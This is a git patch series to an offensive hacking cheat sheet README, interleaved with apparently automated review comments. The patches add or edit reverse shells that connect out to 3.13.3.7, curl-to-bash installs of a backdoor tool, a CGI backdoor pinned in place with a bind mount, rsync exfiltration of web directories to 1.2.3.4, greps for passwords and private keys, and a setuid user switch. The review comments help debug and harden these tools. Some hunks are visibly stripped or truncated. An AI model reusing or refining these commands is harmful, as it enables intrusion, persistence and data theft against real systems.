From 4b441ebf16f0747856f3ffce60e2520c3efeee99 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 27 Dec 2023 09:38:07 +0000 Subject: [PATCH 01/25] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 3626160..10f299b 100644 --- a/README.md +++ b/README.md @@ -2077,7 +2077,7 @@ Telegram Channels Mindmaps & Knowledge 1. [Compass Sec Cheat Sheets](https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet) 2. [Network Pentesting](https://github.com/wearecaster/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.png) -1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg) +1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg) **13.ii. Cool Linux commands** From 700dece34888b64a6b1008d13a3f55081f99090e Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 1 Jan 2024 12:21:27 +0000 Subject: [PATCH 02/25] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 10f299b..6218b00 100644 --- a/README.md +++ b/README.md @@ -1583,7 +1583,7 @@ wfind() { arr=("$@") while [[ ${#arr[@]} -gt 0 ]]; do dir=${arr[${#arr[@]}-1]} - unset 'arr[${#arr[@]}-1]' + unset "arr[${#arr[@]}-1]" find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null)) done From 3f3e93334e95bfb4a30d8d3ff792a2c3c6207365 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 6 Jan 2024 05:57:42 +0000 Subject: [PATCH 03/25] Update README.md --- README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/README.md b/README.md index 6218b00..5fdb952 100644 --- a/README.md +++ b/README.md 
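Review bot: in the `wfind` hunk the quoting change is harmless (bash evaluates the `arr[${#arr[@]}-1]` subscript arithmetically with either quote style), but the loop keeps a side effect worth fixing in the same patch: `IFS=$'\n' arr+=($(find ...))` is a simple command made up only of assignments, so the IFS change is not scoped to one command and persists in the calling shell after `wfind` returns, altering word splitting for everything typed afterwards. Declare `local IFS=$'\n' arr dir` at the top of the function (or save and restore IFS around the loop) so the function stops leaking IFS as well as `arr` and `dir`.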
@@ -79,6 +79,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Restore the date of a file](#restore-timestamp) 1. [Clean logfile](#shell-clean-logs) 1. [Hide files from a User without root privileges](#shell-hide-files) + 1. [Make a file immutable](#perm-files) 1. [Crypto](#crypto) 1. [Generate quick random Password](#gen-password) 1. [Linux transportable encrypted filesystems](#crypto-filesystem) @@ -1679,6 +1680,16 @@ mkdir $'\t' cd $'\t' ``` + +**8.v. Make a file immuteable** + +This will redirect `/var/www/cgi/blah.cgi` to `/boot/backdoor.cgi`. The file `blah.cgi` can not be modified or removed (unless unmounted). +```sh +# /boot/backdoor.cgi contains our backdoor +touch /var/www/cgi/blah.cgi +mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi +``` + --- ## 9. Crypto From 43c9f686b45b9f4cfc65fbc6a4ebd4e23253eebf Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 7 Jan 2024 07:04:07 +0000 Subject: [PATCH 04/25] Update README.md --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 5fdb952..da7ca8e 100644 --- a/README.md +++ b/README.md @@ -1613,10 +1613,9 @@ shred -z foobar.txt ```sh ## SHRED without shred command -shred() -{ +shred() { [[ -z $1 || ! -f "$1" ]] && { echo >&2 "shred [FILE]"; return 255; } - dd bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom >"$1" + dd status=none bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom >"$1" rm -f "${1:?}" } shred foobar.txt From 2332745d1e83f7c405cf44dc40bf2c7a43485f2e Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 18 Jan 2024 08:33:55 +0000 Subject: [PATCH 05/25] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index da7ca8e..193e411 100644 --- a/README.md +++ b/README.md 
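Review bot: the new heading reads `8.v. Make a file immuteable` while the TOC entry added in the same patch says "Make a file immutable"; fix the spelling so they match. The TOC links to `#perm-files`, but the hunk adds no explicit anchor for that id (the neighbouring entries such as `#shell-hide-files` rely on explicit anchors), so the link is dead unless one is added next to the heading. The prose also overstates the effect: a read-only bind mount is not immutability in the `chattr +i` sense; the text itself concedes "unless unmounted", and the mount is listed in `/proc/self/mountinfo` and `findmnt` and does not survive a reboot, which is where anyone auditing the host will see it.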
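Review bot: in the `shred()` hunk, `status=none` silences dd's transfer summary but is a GNU coreutils extension; BusyBox and macOS `dd` reject it as an unknown operand and exit before writing anything, so either drop it or redirect dd's stderr instead. `${1:?}` inside `$(du -sk ${1:?} | cut -f1)` is unquoted and breaks on filenames with spaces even though `"$1"` is quoted on every other line; quote it. Note also that `du -sk` reports allocated 1K blocks rather than the file's byte length (a sparse file reports 0), so the amount written is only loosely tied to the file size; `stat -c %s "$1"` on GNU systems measures what the function actually means.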
@@ -1994,6 +1994,7 @@ OpSec 5. [EFF](https://www.eff.org/) - Clever advise for freedom figthers. Exploits +1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score & PoC search 1. [Traitor](https://github.com/liamg/traitor) - Tries various exploits/vulnerabilities to gain root (LPE) 1. [PacketStorm](https://packetstormsecurity.com) - Our favorite site ever since we shared a Pizza with fringe[at]dtmf.org in NYC in 2000 1. [ExploitDB](https://www.exploit-db.com) - Also includes metasploit db and google hacking db From b78f3dc7c579d9e14f4245dbcf5c2c624c5939d1 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 18 Jan 2024 08:35:33 +0000 Subject: [PATCH 06/25] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 193e411..fabf789 100644 --- a/README.md +++ b/README.md @@ -1994,7 +1994,7 @@ OpSec 5. [EFF](https://www.eff.org/) - Clever advise for freedom figthers. Exploits -1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score & PoC search +1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score & PoC search (by xaitax) 1. [Traitor](https://github.com/liamg/traitor) - Tries various exploits/vulnerabilities to gain root (LPE) 1. [PacketStorm](https://packetstormsecurity.com) - Our favorite site ever since we shared a Pizza with fringe[at]dtmf.org in NYC in 2000 1. [ExploitDB](https://www.exploit-db.com) - Also includes metasploit db and google hacking db From 54a9be22e8e6f4be25994a4faef494f06bd5b2ca Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 19 Jan 2024 17:02:10 +0000 Subject: [PATCH 07/25] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fabf789..8d9543e 100644 --- a/README.md +++ b/README.md 
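Review bot: patch 06 only appends "(by xaitax)" to the SploitScan line that patch 05 added two minutes earlier; squash the pair so the series does not carry a self-correcting commit. While editing this list, the OpSec entry two lines above carries two typos, "Clever advise for freedom figthers" (advice, fighters), that are worth a drive-by fix in the same commit.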
@@ -1428,8 +1428,8 @@ stty raw -echo opost; fg # On target host export SHELL=/bin/bash export TERM=xterm-256color -reset -stty rows 24 columns 120 +reset -I +stty -echo;printf "\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '{ printf "rows "$3" cols "$2; }') # Pimp up your prompt PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] ' ``` From d56dcab72d13ee8c6600c73e0315bb92c1981d4f Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 19 Jan 2024 17:02:42 +0000 Subject: [PATCH 08/25] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8d9543e..09bccd1 100644 --- a/README.md +++ b/README.md @@ -1424,7 +1424,7 @@ python -c 'import pty; pty.spawn("/bin/bash")' stty raw -echo opost; fg ``` -``` +```sh # On target host export SHELL=/bin/bash export TERM=xterm-256color From 43cafa42277e363685e1dc1ffc1bab1474717878 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 22 Jan 2024 09:25:27 +0000 Subject: [PATCH 09/25] Update README.md --- README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 09bccd1..f231f08 100644 --- a/README.md +++ b/README.md 
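Review bot: the new terminal-size line swaps rows and columns. xterm-compatible terminals answer the `\033[18t` query with `ESC[8;<rows>;<cols>t`, so after `awk -F";"` the row count is `$2` and the column count is `$3`, but the hunk emits `printf "rows "$3" cols "$2`, which on a 24x120 terminal runs `stty sane rows 120 cols 24`; swap the two fields. Separately, `read -rdt R` has no timeout, so on a terminal (or relay) that never answers the query the shell blocks forever with echo already disabled by the preceding `stty -echo`; add `-t 2` and fall back to the old fixed `stty rows 24 columns 120` when `$R` is empty, otherwise `stty sane` is called with a missing argument and fails.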
@@ -1234,7 +1234,7 @@ curl -sF document=@file.zip "https://api.telegram.org/bot/sendDocu **5.i.a. Reverse shell with gs-netcat (encrypted)** -Use [gsocket deploy](https://gsocket.io/deploy). It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :> +Use [gsocket deploy](https://gsocket.io/deploy). It spawns a fully functioning PTY reverse shell. Both, the YOU and the remote system, can be behind NAT and the traffic is routed via a relay network. It also supports file upload/download (Ctrl-e c) and alarms when the admin logs in. If netcat is a swiss army knife than gs-netcat is a german battle axe :> ```sh X=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/x)" @@ -1255,6 +1255,12 @@ Start netcat to listen on port 1524 on your system: ```sh nc -nvlp 1524 ``` +After connection, [upgrade](#reverse-shell-interactive) your shell to a fully interactive PTY shell. Alternatively use [pwncat-cs](https://pwncat.org/) instead of netcat: +```sh +pwncat -lp 1524 +# Press "Ctrl-C" if pwncat gets stuck after "registerd new host ...". +# Then type "back" to get the prompt off the remote shell. +``` On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt: ```sh @@ -1271,6 +1277,7 @@ bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &' Use [curlshell](https://github.com/SkyperTHC/curlshell). This also works through proxies and when direct TCP connection to the outside world is prohibited: ```sh +# On YOUR workstation # Generate SSL keys: openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC" # Start your listening server: 
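Review bot: the rewritten gs-netcat paragraph has a grammar slip, "Both, the YOU and the remote system", which should read "Both you and the remote system", and the adjacent "If netcat is a swiss army knife than gs-netcat" should be "then"; the new pwncat comment also spells "registerd" (registered). The added "# On YOUR workstation" comments are a good clarification; the `nc -nvlp 1524` block a few lines above is the one place in this section that still lacks the marker, so add it there for consistency.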
@@ -1297,6 +1304,7 @@ C="curl -Ns telnet://3.13.3.7:1524"; $C &1 | sh 2>&1 | $C >/dev/nul **5.i.e. Reverse shell with OpenSSL (encrypted)** ```sh +# On YOUR workstation: # Generate SSL keys: openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC" # Start your listening server: From 2778ca7bde8faf2532d8d5e5285da7a8b9144954 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 22 Jan 2024 09:30:44 +0000 Subject: [PATCH 10/25] Update README.md --- README.md | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index f231f08..8585008 100644 --- a/README.md +++ b/README.md @@ -1258,8 +1258,8 @@ nc -nvlp 1524 After connection, [upgrade](#reverse-shell-interactive) your shell to a fully interactive PTY shell. Alternatively use [pwncat-cs](https://pwncat.org/) instead of netcat: ```sh pwncat -lp 1524 -# Press "Ctrl-C" if pwncat gets stuck after "registerd new host ...". -# Then type "back" to get the prompt off the remote shell. +# Press "Ctrl-C" if pwncat gets stuck at "registerd new host ...". +# Then type "back" to get the prompt of the remote shell. ``` On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt: @@ -1309,10 +1309,13 @@ C="curl -Ns telnet://3.13.3.7:1524"; $C &1 | sh 2>&1 | $C >/dev/nul openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC" # Start your listening server: openssl s_server -port 1524 -cert cert.pem -key key.pem +# Or pwncat: +# pwncat -lp 1524 --ssl ``` + ```sh -# On the target: -{ openssl s_client -connect 3.13.3.7:1524 -quiet &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : +# On the target, start an openssl reverse shell as background process: +({ openssl s_client -connect 3.13.3.7:1524 -quiet &- 2>/dev/null | sh 2>&3 >&3 3>&- ; } 3>&1 | : & ) ``` 
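Review bot: the new background reverse-shell line reads `-quiet &- 2>/dev/null | sh`; a bare `&-` is not valid shell syntax (it needs a redirection operator in front of it, such as `<&-` to close stdin or `2>&-`), so as shown here the line is either truncated in this rendering or broken in the source; verify the intended redirection before merging rather than trusting the diff as displayed. In the same patch the pwncat comment is corrected from "after"/"off" to "at"/"of" but "registerd" is left misspelled; fix it in the same commit.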
From 4b96900e95b79f5f057fe0a12af19bd89da1fdf5 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 22 Jan 2024 09:42:59 +0000 Subject: [PATCH 11/25] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8585008..29b9b82 100644 --- a/README.md +++ b/README.md @@ -1470,7 +1470,7 @@ or bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/x)" ``` -or deploy gsocket by running their own deployment server: +or deploy gsocket by running your own deployment server: ```sh LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/xs)" # Notice '/xs' instead of '/x' ``` From 4f194c8f1f6b8b98e9220051b989a8c3de61bdeb Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 27 Jan 2024 09:13:06 +0000 Subject: [PATCH 12/25] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 29b9b82..d3a7958 100644 --- a/README.md +++ b/README.md @@ -749,7 +749,7 @@ timeout 5 bash -c " Date: Wed, 31 Jan 2024 01:16:52 +0000 Subject: [PATCH 13/25] Update README.md --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index d3a7958..3fce5e8 100644 --- a/README.md +++ b/README.md @@ -1533,9 +1533,8 @@ Other methods: Add this line to the beginning of any PHP file: ```php - + ``` -(Thanks @dono for making this 3 bytes smaller than the smallest) Test the backdoor: ```sh From 1ee6ebe8951ec485cc1dca82d89bf85227151501 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 31 Jan 2024 14:45:17 +0000 Subject: [PATCH 14/25] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 3fce5e8..0562f1f 100644 --- a/README.md +++ b/README.md 
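Review bot: the hunk body of patch 12 (around README line 749, the `timeout 5 bash -c "` line) and the `From:`/`Date:` header of patch 13 are missing from this rendering, and patch 13's PHP hunk shows only an empty `-` and `+` line where the one-line PHP snippet should be, so the only visible part of that change is the removed credit "(Thanks @dono ...)". Both gaps look like `<...>` sequences stripped as markup; re-render the series from the raw mbox before reviewing these two commits, and consider keeping the credit line, since the text above it still says the snippet is a contributed improvement.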
@@ -1155,7 +1155,7 @@ The same encrypted (OpenSSL): Receiver: ```posh -openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt +openssl req -subj '/CN=example.com/O=EL/C=XX' -new -newkey ed25519 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt cat ssl.key ssl.crt >ssl.pem rm -f ssl.key ssl.crt mkdir upload @@ -1169,7 +1169,7 @@ Sender: rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- ./warez 0: # Using rsync + openssl -rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername thc -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- ./warez 0: +rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- ./warez 0: ``` Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service). From d26fc018f0dd7eaa932c8f6fd69ea963a0d8c16b Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 31 Jan 2024 14:53:10 +0000 Subject: [PATCH 15/25] Update README.md --- README.md | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 0562f1f..688cb4f 100644 --- a/README.md +++ b/README.md @@ -1159,6 +1159,7 @@ openssl req -subj '/CN=example.com/O=EL/C=XX' -new -newkey ed25519 -days 14 -nod cat ssl.key ssl.crt >ssl.pem rm -f ssl.key ssl.crt mkdir upload +cat ssl.pem socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.pem EXEC:"rsync --server -logtprR --safe-links --partial upload" ``` 
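Review bot: switching the self-signed cert to `-newkey ed25519` and dropping `-sha256` is consistent (Ed25519 uses its own internal hash), but the hunk leaves the verification posture unchanged: the socat sender still passes `verify=0` and the openssl sender omits `-verify_return_error`, so neither client rejects a listener that presents a different certificate, even though both already hold `ssl.pem` as `cafile`/`-CAfile`. Because the same pem is key, cert and CA on both ends, `verify=1` (socat) and `-verify_return_error` (openssl s_client) would give mutual authentication with no extra key material. The commit message should also state that `-newkey ed25519` needs OpenSSL 1.1.1 or later on both ends, including the OpenSSL that socat is linked against.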
@@ -1166,10 +1167,15 @@ Sender: ```posh # Copy the ssl.pem from the Receiver to the Sender and send directory named 'warez' # Using rsync + socat-ssl -rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- ./warez 0: - +up1() { + rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- "$@" 0: +} # Using rsync + openssl -rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- ./warez 0: +up2() { + rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- "$@" 0: +} +up1 /var/www/./warez +up2 /var/www/./warez ``` Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service). From 1025de0e592511b66c5b811f141f7a8b1e1b832f Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 2 Feb 2024 09:51:27 +0000 Subject: [PATCH 16/25] Update README.md --- README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 688cb4f..25ad223 100644 --- a/README.md +++ b/README.md @@ -1609,7 +1609,7 @@ wfind() { # Usage: wfind /etc /var /usr ``` -Find local passwords: +Find local passwords (using noseyparker): ```sh curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16.0/noseyparker-v0.16.0-x86_64-unknown-linux-gnu.tar.gz | tar xvfz - --transform="flags=r;s|.*/||" --no-anchored --wildcards noseyparker && \ ./noseyparker scan . && \ 
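Review bot: the comment at the top of the Sender block still says "send directory named 'warez'", but `up1`/`up2` now take their paths from `"$@"`; update the comment to describe the argument and the `/var/www/./warez` convention (with `-R`, rsync treats the `/./` marker as the start of the relative path, so only `warez/...` is recreated under `upload/`). The `cat ssl.pem` added on the Receiver prints the private key to the terminal with no comment saying why; note that it is there to be copied to the Sender, since that pem is the only secret protecting the channel and readers should not leave it in scrollback or logs.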
@@ -1617,6 +1617,14 @@ curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16 ``` (Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history) +Using `grep`: +```sh +# Find passwords (without garbage). +grep -HEronasir '.{16}password.{,64}' . +# Find TLS or OpenSSH keys: +grep -r -F -- " PRIVATE KEY-----" . +``` + --- ## 8. Shell Hacks From 2d5ef92ea002eded6add9b5f7a7a58f2b755de40 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 3 Feb 2024 18:07:28 +0000 Subject: [PATCH 17/25] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 25ad223..31c86b9 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,7 @@ # THC's favourite Tips, Tricks & Hacks (Cheat Sheet) +https://thc.org/tips https://tinyurl.com/thctips A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them. From cdb3dfa7855877a4f1175f1b449ae4608f98a8da Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 5 Feb 2024 15:08:59 +0000 Subject: [PATCH 18/25] Update README.md --- README.md | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 31c86b9..83cda57 100644 --- a/README.md +++ b/README.md 
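Review bot: `-HEronasir` contains `r` twice; drop the duplicate. The pattern `.{16}password.{,64}` requires exactly 16 characters before the keyword, so `password=...` at the start of a line or anywhere in the first 15 columns (the usual layout in config files) never matches; `.{,16}` keeps the context window while allowing shorter prefixes. For the second grep, `-l` would list only the files containing a `PRIVATE KEY-----` header instead of printing key material to the terminal and into shell history.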
@@ -607,17 +607,14 @@ DSTIP=1.2.3.4 DPORT=443 echo 1 >/proc/sys/net/ipv4/ip_forward -iptables -t mangle -I PREROUTING -p tcp --dport ${FPORT:?} -m addrtype --dst-type LOCAL -j MARK --set-mark 1188 -iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark +iptables -t mangle -C PREROUTING -j CONNMARK --restore-mark || iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark +iptables -t mangle -A PREROUTING -p tcp --dport ${FPORT:?} -m addrtype --dst-type LOCAL -j MARK --set-mark 1188 iptables -t nat -I PREROUTING -p tcp -m mark --mark 1188 -j DNAT --to ${DSTIP:?}:${DPORT:?} iptables -I FORWARD -m mark --mark 1188 -j ACCEPT iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark - -iptables -t mangle -I INPUT -m mark --mark 1188 -j ACCEPT -iptables -t mangle -I INPUT -j CONNMARK --restore-mark ``` We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks. From 2f71273320dc08e8e961514787c5c4440e2e3b61 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 5 Feb 2024 17:13:22 +0000 Subject: [PATCH 19/25] Update README.md --- README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/README.md b/README.md index 83cda57..72edae5 100644 --- a/README.md +++ b/README.md @@ -81,6 +81,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Clean logfile](#shell-clean-logs) 1. [Hide files from a User without root privileges](#shell-hide-files) 1. [Make a file immutable](#perm-files) + 1. [Change user without sudo/su] 1. [Crypto](#crypto) 1. [Generate quick random Password](#gen-password) 1. [Linux transportable encrypted filesystems](#crypto-filesystem) 
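Review bot: the idempotency guard (`-C ... || -I ...`) is added for the CONNMARK restore rule only; the MARK rule is appended with a plain `-A` and the nat/FORWARD/POSTROUTING rules are still inserted with unconditional `-I`, so running the block a second time skips the first rule but duplicates the other five. Apply the same `-C ... ||` pattern to every rule. Switching the MARK rule to `-A` is correct (restore-mark must run before a new mark is set), but the commit message says nothing about why the two mangle INPUT rules were removed; document that, since anyone diffing against the old version will want to know whether locally delivered marked packets are still handled.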
@@ -1711,6 +1712,16 @@ touch /var/www/cgi/blah.cgi mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi ``` +**8.vi. Change user without sudo/su** + +Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`) +```bash +U=$(id -u UserName) ### <-- Set UserName +H="$(grep "$U" /etc/passwd | cut -d: -f6)" +HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execl('/bin/bash', '-bash')" +# change -bash to bash to not make this a login shell. +``` + --- ## 9. Crypto From 6c513a83c81b7ce3565f7e6e9081c2abbdb2021a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 5 Feb 2024 17:14:19 +0000 Subject: [PATCH 20/25] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 72edae5..1264c37 100644 --- a/README.md +++ b/README.md @@ -81,7 +81,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Clean logfile](#shell-clean-logs) 1. [Hide files from a User without root privileges](#shell-hide-files) 1. [Make a file immutable](#perm-files) - 1. [Change user without sudo/su] + 1. [Change user without sudo/su](#nosudo) 1. [Crypto](#crypto) 1. [Generate quick random Password](#gen-password) 1. [Linux transportable encrypted filesystems](#crypto-filesystem) @@ -1712,6 +1712,7 @@ touch /var/www/cgi/blah.cgi mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi ``` + **8.vi. Change user without sudo/su** Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`) From a79c2c62744d3df228a03c6ab9341cfd18dbf171 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 11 Feb 2024 12:02:37 +0000 Subject: [PATCH 21/25] Update README.md --- README.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1264c37..a9f00f6 100644 --- a/README.md +++ b/README.md 
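Review bot: in the new `8.vi` block, `grep "$U" /etc/passwd` matches the numeric UID as a substring anywhere on the line (UID 1000 also matches a GID of 1000 on another account, `10001`, or digits in a home path), so `H` can contain several home directories joined by newlines and `HOME` is set to garbage; use `getent passwd "$U" | cut -d: -f6` (or `awk -F: -v u="$U" '$3==u{print $6}' /etc/passwd`). The block also changes only the UID: `os.setuid()` leaves the caller's GID, supplementary groups and environment in place, so the spawned shell is not equivalent to a `su -` login, and the heading "without sudo/su" is misleading in that it only works when the caller already holds CAP_SETUID (i.e. is root); "as root, without sudo/su" says what it does.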
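Review bot: patch 20 only supplies the `(#nosudo)` target that the TOC entry `[Change user without sudo/su]` was missing in patch 19 one minute earlier, plus a blank line; squash the two commits. The `#nosudo` id needs an explicit anchor next to the `8.vi` heading, as with the other section links, or the TOC entry stays dead.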
@@ -751,7 +751,7 @@ HashCat is our go-to tool for everything else: hashcat my-hash /usr/share/wordlists/rockyou.txt ``` -Or using a [7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask) on GPU: +Or using a [10-days 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask) on GPU: ```sh curl -fsSL https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask -o 10-days_7-16.hcmask # -d2 == Use GPU #2 only (device #2) 
